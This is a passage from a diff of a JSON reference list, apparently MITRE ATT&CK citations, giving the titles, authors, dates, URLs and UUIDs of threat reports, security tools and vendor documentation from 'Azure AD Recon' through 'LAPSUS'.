"26a554dc-39c0-4638-902d-7e84fe01b961", + "value": "U.S. Justice Department GRU Botnet February 2024" + }, + { + "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2020-06-13T00:00:00Z", + "refs": [ + "https://o365blog.com/post/just-looking/" + ], + "source": "MITRE", + "title": "Just looking: Azure Active Directory reconnaissance as an outsider" + }, + "related": [], + "uuid": "42dad2a3-5b33-4be4-a19b-58a27fb3ee5d", + "value": "Azure Active Directory Reconnaisance" + }, + { + "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved February 1, 2022.", + "meta": { + "date_accessed": "2022-02-01T00:00:00Z", + "date_published": "2020-06-13T00:00:00Z", + "refs": [ + "https://o365blog.com/post/just-looking" + ], + "source": "MITRE", + "title": "Just looking: Azure Active Directory reconnaissance as an outsider" + }, + "related": [], + "uuid": "16565eaf-44fb-44f4-b490-40dc1160ff2b", + "value": "Azure AD Recon" + }, + { + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2020-05-04T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" + ], + "source": "MITRE", + "title": "Kaiji: New Chinese Linux malware turning to Golang" + }, + "related": [], + "uuid": "ef1fbb40-da6f-41d0-a44a-9ff444e2ad89", + "value": "intezer-kaiji-malware" + }, + { + "description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.", + "meta": { + "date_accessed": "2017-12-11T00:00:00Z", + "date_published": "2016-11-01T00:00:00Z", + "refs": [ + "https://github.com/nccgroup/redsnarf" + ], + "source": "MITRE", + "title": "Kali Redsnarf" + }, + "related": [], + "uuid": "459fcde2-7ac3-4640-a5bc-cd8750e54962", + "value": "Kali Redsnarf" + }, + { + "description": "Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "meta": { + "date_accessed": "2019-10-10T00:00:00Z", + "date_published": "2014-05-03T00:00:00Z", + "refs": [ + "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + ], + "source": "MITRE", + "title": "Kansa: Service related collectors and analysis" + }, + "related": [], + "uuid": "58d5bc0b-8548-4c3a-8302-e07df3b961ff", + "value": "TrustedSignal Service Failure" + }, + { + "description": "Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "meta": { + "date_accessed": "2019-10-10T00:00:00Z", + "date_published": "2014-05-03T00:00:00Z", + "refs": [ + "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + ], + "source": "MITRE", + "title": "Kansa: Service related collectors and analysis" + }, + "related": [], + "uuid": "d854f84a-4d70-4ef4-9197-d8f5396feabb", + "value": "Kansa Service related collectors" + }, + { + "description": "Cybersecurity Infrastructure and Defense Agency. (2022, June 2). Karakurt Data Extortion Group. Retrieved March 10, 2023.", + "meta": { + "date_accessed": "2023-03-10T00:00:00Z", + "date_published": "2022-06-02T00:00:00Z", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a" + ], + "source": "MITRE", + "title": "Karakurt Data Extortion Group" + }, + "related": [], + "uuid": "5a9a79fa-532b-582b-9741-cb732803cd22", + "value": "CISA Karakurt 2022" + }, + { + "description": "Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique. Retrieved May 24, 2018.", + "meta": { + "date_accessed": "2018-05-24T00:00:00Z", + "date_published": "2018-05-07T00:00:00Z", + "refs": [ + "https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" + ], + "source": "MITRE", + "title": "Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelgänging technique" + }, + "related": [], + "uuid": "bbb9bcb5-cd44-4dcb-a7e5-f6c4cf93f74f", + "value": "Kaspersky Lab SynAck May 2018" + }, + { + "description": "Levene, B, et al. (2017, May 03). Kazuar: Multiplatform Espionage Backdoor with API Access. Retrieved July 17, 2018.", + "meta": { + "date_accessed": "2018-07-17T00:00:00Z", + "date_published": "2017-05-03T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + ], + "source": "MITRE", + "title": "Kazuar: Multiplatform Espionage Backdoor with API Access" + }, + "related": [], + "uuid": "07e64ee6-3d3e-49e4-bb06-ff5897e26ea9", + "value": "Unit 42 Kazuar May 2017" + }, + { + "description": "Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.", + "meta": { + "date_accessed": "2016-06-08T00:00:00Z", + "date_published": "2016-05-29T00:00:00Z", + "refs": [ + "https://citizenlab.org/2016/05/stealth-falcon/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Keep Calm and (Don’t) Enable Macros: A New Threat Actor Targets UAE Dissidents" + }, + "related": [], + "uuid": "11f46b1e-a141-4d25-bff0-e955251be7f5", + "value": "Citizen Lab Stealth Falcon May 2016" + }, + { + "description": "Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.", + "meta": { + "date_accessed": "2021-02-08T00:00:00Z", + "refs": [ + "https://github.com/GhostPack/KeeThief" + ], + "source": "MITRE", + "title": "KeeThief" + }, + "related": [], + "uuid": "3b6231fb-5b52-4a3a-a21f-0881901d0037", + "value": "Github KeeThief" + }, + { + "description": "Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/kekeo" + ], + "source": "MITRE", + "title": "Kekeo" + }, + "related": [], + "uuid": "0b69f0f5-dd4a-4926-9369-8253a0c3ddea", + "value": "Kekeo" + }, + { + "description": "Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.", + "meta": { + "date_accessed": "2018-03-23T00:00:00Z", + "date_published": "2016-11-01T00:00:00Z", + "refs": [ + "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + ], + "source": "MITRE", + "title": "Kerberoasting Without Mimikatz" + }, + "related": [], + "uuid": "6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a", + "value": "Harmj0y Kerberoast Nov 2016" + }, + { + "description": "Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.", + "meta": { + "date_accessed": "2020-02-27T00:00:00Z", + "date_published": "2014-09-12T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=227" + ], + "source": "MITRE", + "title": "Kerberos, Active Directory’s Secret Decoder Ring" + }, + "related": [], + "uuid": "5f78a554-2d5c-49af-8c6c-6e10f9aec997", + "value": "ADSecurity Kerberos Ring Decoder" + }, + { + "description": "Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "date_published": "2007-10-27T00:00:00Z", + "refs": [ + "http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html" + ], + "source": "MITRE", + "title": "Kerberos for Macintosh Preferences Documentation" + }, + "related": [], + "uuid": "8e09346b-03ce-4627-a365-f2f63089d1e0", + "value": "macOS kerberos framework MIT" + }, + { + "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", + "meta": { + "date_accessed": "2020-02-27T00:00:00Z", + "date_published": "2015-03-24T00:00:00Z", + "refs": [ + "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" + ], + "source": "MITRE", + "title": "Kerberos Golden Ticket Check (Updated)" + }, + "related": [], + "uuid": "2d8790db-b088-40d0-be99-acd3e695c7a6", + "value": "Microsoft Kerberos Golden Ticket" + }, + { + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "meta": { + "date_accessed": "2017-07-13T00:00:00Z", + "date_published": "2016-04-26T00:00:00Z", + "refs": [ + "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + ], + "source": "MITRE", + "title": "Kerberos Golden Ticket Protection" + }, + "related": [], + "uuid": "268f9cfa-71f4-4cb1-96f3-c61e71892d30", + "value": "CERT-EU Golden Ticket Protection" + }, + { + "description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.", + "meta": { + "date_accessed": "2017-12-01T00:00:00Z", + "date_published": "2015-08-07T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1640" + ], + "source": "MITRE", + "title": "Kerberos Golden Tickets are Now More Golden" + }, + "related": [], + "uuid": "aac51d49-9a72-4456-8539-8a5f5d0ef7d7", + "value": "AdSecurity Kerberos GT Aug 2015" + }, + { + "description": "Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account. Retrieved January 30, 2020.", + "meta": { + "date_accessed": "2020-01-30T00:00:00Z", + "date_published": "2014-11-10T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=483" + ], + "source": "MITRE", + "title": "Kerberos & KRBTGT: Active Directory’s Domain Kerberos Service Account" + }, + "related": [], + "uuid": "6e61f3e1-35e6-44f4-9bc4-60b2bcb71b15", + "value": "ADSecurity Kerberos and KRBTGT" + }, + { + "description": "Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.", + "meta": { + "date_accessed": "2020-08-25T00:00:00Z", + "date_published": "2014-03-18T00:00:00Z", + "refs": [ + "https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx" + ], + "source": "MITRE", + "title": "Kerberos Pre-Authentication: Why It Should Not Be Disabled" + }, + "related": [], + "uuid": "328953ed-93c7-46c0-9a05-53dc44d294fe", + "value": "Microsoft Kerberos Preauth 2014" + }, + { + "description": "Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2020-04-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html" + ], + "source": "MITRE", + "title": "Kerberos Tickets on Linux Red Teams" + }, + "related": [], + "uuid": "5aea042f-4eb1-4092-89be-3db695053470", + "value": "Linux Kerberos Tickets" + }, + { + "description": "Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020.", + "meta": { + "date_accessed": "2020-06-04T00:00:00Z", + "date_published": "2020-02-06T00:00:00Z", + "refs": [ + "https://www.kernel.org/doc/html/latest/security/self-protection.html" + ], + "source": "MITRE", + "title": "Kernel Self-Protection" + }, + "related": [], + "uuid": "b75466f2-c20e-4c4a-b71b-e91fb39cfcd3", + "value": "Kernel Self Protection Project" + }, + { + "description": "Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.", + "meta": { + "date_accessed": "2019-06-14T00:00:00Z", + "date_published": "2013-06-07T00:00:00Z", + "refs": [ + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" + ], + "source": "MITRE", + "title": "KeyBoy, Targeted Attacks against Vietnam and India" + }, + "related": [], + "uuid": "e549add8-1dfd-40d6-8974-35e1a38a707b", + "value": "Rapid7 KeyBoy Jun 2013" + }, + { + "description": "Apple. (n.d.). Keychain Items. Retrieved April 12, 2022.", + "meta": { + "date_accessed": "2022-04-12T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/security/keychain_services/keychain_items" + ], + "source": "MITRE", + "title": "Keychain Items" + }, + "related": [], + "uuid": "4e499819-b910-4c07-a8b4-a7d40f2c0ac4", + "value": "Keychain Items Apple Dev API" + }, + { + "description": "Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.", + "meta": { + "date_accessed": "2022-04-11T00:00:00Z", + "refs": [ + "https://developer.apple.com/documentation/security/keychain_services" + ], + "source": "MITRE", + "title": "Keychain Services" + }, + "related": [], + "uuid": "0754f48d-dad8-480c-953c-256be4dfcfc3", + "value": "Keychain Services Apple" + }, + { + "description": "Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Keychain_(software)" + ], + "source": "MITRE", + "title": "Keychain (software)" + }, + "related": [], + "uuid": "8aac5356-31cb-4e0b-a766-9aa07d977acd", + "value": "Wikipedia keychain" + }, + { + "description": "Mark Manning. (2020, July 23). Keyctl-unmask: \"Going Florida\" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.", + "meta": { + "date_accessed": "2022-07-06T00:00:00Z", + "date_published": "2020-07-23T00:00:00Z", + "refs": [ + "https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/" + ], + "source": "MITRE", + "title": "Keyctl-unmask: \"Going Florida\" on The State Of Containerizing Linux Keyrings" + }, + "related": [], + "uuid": "75db8c88-e547-4d1b-8f22-6ace2b3d7ad4", + "value": "Keyctl-unmask" + }, + { + "description": "Google. (n.d.). Key rotation. Retrieved October 18, 2019.", + "meta": { + "date_accessed": "2019-10-18T00:00:00Z", + "refs": [ + "https://cloud.google.com/kms/docs/key-rotation" + ], + "source": "MITRE", + "title": "Key rotation" + }, + "related": [], + "uuid": "4ba76434-f5ca-4a1d-b111-9292f6debfdb", + "value": "Google Cloud Encryption Key Rotation" + }, + { + "description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.", + "meta": { + "date_accessed": "2021-01-12T00:00:00Z", + "date_published": "2016-12-29T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" + ], + "source": "MITRE", + "title": "KillDisk Disk-Wiping Malware Adds Ransomware Component" + }, + "related": [], + "uuid": "9d22f13d-af6d-47b5-93ed-5e4b85b94978", + "value": "KillDisk Ransomware" + }, + { + "description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.", + "meta": { + "date_accessed": "2021-01-12T00:00:00Z", + "date_published": "2018-06-07T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" + ], + "source": "MITRE", + "title": "KillDisk Variant Hits Latin American Finance Industry" + }, + "related": [], + "uuid": "8ae31db0-2744-4366-9747-55fc4679dbf5", + "value": "Trend Micro KillDisk 1" + }, + { + "description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.", + "meta": { + "date_accessed": "2021-01-12T00:00:00Z", + "date_published": "2018-01-15T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" + ], + "source": "MITRE", + "title": "KillDisk Variant Hits Latin American Financial Groups" + }, + "related": [], + "uuid": "62d9a4c9-e669-4dd4-a584-4f3e3e54f97f", + "value": "Trend Micro KillDisk 2" + }, + { + "description": "Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August). Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2011-08-01T00:00:00Z", + "refs": [ + "https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf" + ], + "source": "MITRE", + "title": "Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode design" + }, + "related": [], + "uuid": "19d7ccc6-76ed-4b12-af50-f810fbc22037", + "value": "Killing IOS diversity myth" + }, + { + "description": "Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco IOS rootkits. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2008-05-01T00:00:00Z", + "refs": [ + "https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf" + ], + "source": "MITRE", + "title": "Killing the myth of Cisco IOS rootkits" + }, + "related": [], + "uuid": "538070d6-fbdb-4cc9-8ddf-c331e4375cfb", + "value": "Killing the myth of Cisco IOS rootkits" + }, + { + "description": "Vedere Labs. (2022, June 2). Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group. Retrieved October 9, 2023.", + "meta": { + "date_accessed": "2023-10-09T00:00:00Z", + "date_published": "2022-06-02T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.forescout.com/resources/analysis-of-killnet-report/" + ], + "source": "Tidal Cyber", + "title": "Killnet: Analysis of Attacks from a Prominent Pro-Russian Hacktivist Group" + }, + "related": [], + "uuid": "628a9288-ae87-4deb-92ce-081ba88c15be", + "value": "Vedere Labs Killnet 2022" + }, + { + "description": "Flashpoint. (n.d.). Killnet: Inside the World’s Most Prominent Pro-Kremlin Hacktivist Collective. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://flashpoint.io/intelligence-101/killnet/" + ], + "source": "Tidal Cyber", + "title": "Killnet: Inside the World’s Most Prominent Pro-Kremlin Hacktivist Collective" + }, + "related": [], + "uuid": "502cc03b-350b-4e2d-9436-364c43a0a203", + "value": "Flashpoint Glossary Killnet" + }, + { + "description": "Jazi, H. (2021, June 1). Kimsuky APT continues to target South Korean government using AppleSeed backdoor. Retrieved June 10, 2021.", + "meta": { + "date_accessed": "2021-06-10T00:00:00Z", + "date_published": "2021-06-01T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Kimsuky APT continues to target South Korean government using AppleSeed backdoor" + }, + "related": [], + "uuid": "9a497c56-f1d3-4889-8c1a-14b013f14668", + "value": "Malwarebytes Kimsuky June 2021" + }, + { + "description": "Kim, J. et al. (2019, October). KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING. Retrieved November 2, 2020.", + "meta": { + "date_accessed": "2020-11-02T00:00:00Z", + "date_published": "2019-10-01T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-kimsuky-group-tracking-king-spearphishing/" + ], + "source": "MITRE", + "title": "KIMSUKY GROUP: TRACKING THE KING OF THE SPEAR PHISHING" + }, + "related": [], + "uuid": "e9a8db17-8b10-44c2-a0e1-88e6bcfb67f1", + "value": "VirusBulletin Kimsuky October 2019" + }, + { + "description": "Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.", + "meta": { + "date_accessed": "2019-08-13T00:00:00Z", + "date_published": "2019-04-03T00:00:00Z", + "refs": [ + "https://blog.alyac.co.kr/2234" + ], + "source": "MITRE", + "title": "Kimsuky Organization Steals Operation Stealth Power" + }, + "related": [], + "uuid": "8e52db6b-5ac3-448a-93f6-96a21787a346", + "value": "EST Kimsuky April 2019" + }, + { + "description": "ThreatConnect. (2020, September 28). Kimsuky Phishing Operations Putting In Work. Retrieved October 30, 2020.", + "meta": { + "date_accessed": "2020-10-30T00:00:00Z", + "date_published": "2020-09-28T00:00:00Z", + "refs": [ + "https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/" + ], + "source": "MITRE", + "title": "Kimsuky Phishing Operations Putting In Work" + }, + "related": [], + "uuid": "45d64462-2bed-46e8-ac52-9d4914608a93", + "value": "ThreatConnect Kimsuky September 2020" + }, + { + "description": "BRI. (2019, April). Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America. Retrieved October 7, 2019.", + "meta": { + "date_accessed": "2019-10-07T00:00:00Z", + "date_published": "2019-04-01T00:00:00Z", + "refs": [ + "https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/" + ], + "source": "MITRE", + "title": "Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America" + }, + "related": [], + "uuid": "b72dd3a1-62ca-4a05-96a8-c4bddb17db50", + "value": "BRI Kimsuky April 2019" + }, + { + "description": "Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.", + "meta": { + "date_accessed": "2021-10-14T00:00:00Z", + "date_published": "2021-03-03T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-server/administration/windows-commands/klist" + ], + "source": "MITRE", + "title": "klist" + }, + "related": [], + "uuid": "f500340f-23fc-406a-97ef-0de787ef8cec", + "value": "Microsoft Klist" + }, + { + "description": "Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.", + "meta": { + "date_accessed": "2018-02-26T00:00:00Z", + "date_published": "2016-08-18T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html" + ], + "source": "MITRE", + "title": "Know Your Enemy: New Financially-Motivated & Spear-Phishing Group" + }, + "related": [], + "uuid": "0119687c-b46b-4b5f-a6d8-affa14258392", + "value": "FireEye Know Your Enemy FIN8 Aug 2016" + }, + { + "description": "Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.", + "meta": { + "date_accessed": "2018-06-18T00:00:00Z", + "date_published": "2017-07-19T00:00:00Z", + "refs": [ + "https://github.com/zerosum0x0/koadic" + ], + "source": "MITRE", + "title": "Koadic" + }, + "related": [], + "uuid": "54cbf1bd-9aed-4f82-8c15-6e88dd5d8d64", + "value": "Github Koadic" + }, + { + "description": "M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos – A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2021-02-02T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" + ], + "source": "MITRE", + "title": "Kobalos – A complex Linux threat to high performance computing infrastructure" + }, + "related": [], + "uuid": "883a9417-f7f6-4aa6-8708-8c320d4e0a7a", + "value": "ESET Kobalos Feb 2021" + }, + { + "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-05-03T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html" + ], + "source": "MITRE", + "title": "KONNI: A Malware Under The Radar For Years" + }, + "related": [], + "uuid": "4cb69c58-4e47-4fb9-9eef-8a0b5447a553", + "value": "Talos Konni May 2017" + }, + { + "description": "Santos, R. (2022, January 26). KONNI evolves into stealthier RAT. Retrieved April 13, 2022.", + "meta": { + "date_accessed": "2022-04-13T00:00:00Z", + "date_published": "2022-01-26T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/" + ], + "source": "MITRE", + "title": "KONNI evolves into stealthier RAT" + }, + "related": [], + "uuid": "5dbb84dc-a991-4fa7-8528-639b1430ca02", + "value": "Malwarebytes KONNI Evolves Jan 2022" + }, + { + "description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.", + "meta": { + "date_accessed": "2018-05-21T00:00:00Z", + "date_published": "2018-01-16T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ], + "source": "MITRE", + "title": "Korea In The Crosshairs" + }, + "related": [], + "uuid": "bf8b2bf0-cca3-437b-a640-715f9cc945f7", + "value": "Talos Group123" + }, + { + "description": "kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/kubectl/kubectl/" + ], + "source": "MITRE", + "title": "kubectl" + }, + "related": [], + "uuid": "5aae1cd7-4e24-40a5-90d8-1f6431851a8f", + "value": "Kube Kubectl" + }, + { + "description": "The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/" + ], + "source": "MITRE", + "title": "Kubelet" + }, + "related": [], + "uuid": "57527fb9-d076-4ce1-afb5-e7bdb9c9d74c", + "value": "Kubernetes Kubelet" + }, + { + "description": "The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/" + ], + "source": "MITRE", + "title": "Kubernetes CronJob" + }, + "related": [], + "uuid": "354d242c-227e-4827-b559-dc1650d37acd", + "value": "Kubernetes CronJob" + }, + { + "description": "National Security Agency, Cybersecurity and Infrastructure Security Agency. (2022, March). Kubernetes Hardening Guide. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF" + ], + "source": "MITRE", + "title": "Kubernetes Hardening Guide" + }, + "related": [], + "uuid": "e423b14c-dd39-4b36-9b95-96efbcaf0a12", + "value": "Kubernetes Hardening Guide" + }, + { + "description": "The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/job/" + ], + "source": "MITRE", + "title": "Kubernetes Jobs" + }, + "related": [], + "uuid": "21a4388d-dbf8-487b-a2a2-67927b099e4a", + "value": "Kubernetes Jobs" + }, + { + "description": "The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard). Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/" + ], + "source": "MITRE", + "title": "Kubernetes Web UI (Dashboard)" + }, + "related": [], + "uuid": "02f23351-df83-4aae-a0bd-614ed91bc683", + "value": "Kubernetes Dashboard" + }, + { + "description": "Paul Litvak. (2020, October 8). Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2020-10-08T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/" + ], + "source": "MITRE", + "title": "Kud I Enter Your Server? New Vulnerabilities in Microsoft Azure" + }, + "related": [], + "uuid": "e86abbd9-f349-4d90-8ec9-899fe1637f94", + "value": "Intezer App Service Phishing" + }, + { + "description": "Alintanahin, K. (2014, March 13). Kunming Attack Leads to Gh0st RAT Variant. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-03-13T00:00:00Z", + "refs": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/kunming-attack-leads-to-gh0st-rat-variant/" + ], + "source": "MITRE", + "title": "Kunming Attack Leads to Gh0st RAT Variant" + }, + "related": [], + "uuid": "1c5ee0d2-4d6c-4a5f-9790-79bfb7abc53f", + "value": "Alintanahin 2014" + }, + { + "description": "DeRyke, A.. (2019, June 7). Lab Notes: Persistence and Privilege Elevation using the Powershell Profile. Retrieved July 8, 2019.", + "meta": { + "date_accessed": "2019-07-08T00:00:00Z", + "date_published": "2019-06-07T00:00:00Z", + "refs": [ + "https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html" + ], + "source": "MITRE", + "title": "Lab Notes: Persistence and Privilege Elevation using the Powershell Profile" + }, + "related": [], + "uuid": "8fcbd99a-1fb8-4ca3-9efd-a98734d4397d", + "value": "Wits End and Shady PowerShell Profiles" + }, + { + "description": "Brown, D., et al. (2022, April 28). LAPSUS$: Recent techniques, tactics and procedures. Retrieved December 22, 2022.", + "meta": { + "date_accessed": "2022-12-22T00:00:00Z", + "date_published": "2022-04-28T00:00:00Z", + "refs": [ + "https://research.nccgroup.com/2022/04/28/lapsus-recent-techniques-tactics-and-procedures/" + ], + "source": "MITRE", + "title": "LAPSUS$: Recent techniques, tactics and procedures" + }, + "related": [], + "uuid": "d2e7c69d-8a10-51ca-af7b-22d08f4dfe45", + "value": "NCC Group LAPSUS Apr 2022" + }, + { + "description": "BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.", + "meta": { + "date_accessed": "2022-06-09T00:00:00Z", + "date_published": "2022-04-01T00:00:00Z", + "refs": [ + "https://www.bbc.com/news/technology-60953527" + ], + "source": "MITRE", + "title": "LAPSUS: Two UK Teenagers Charged with Hacking for Gang" + }, + "related": [], + "uuid": "6c9f4312-6c9d-401c-b20f-12ce50c94a96", + "value": "BBC 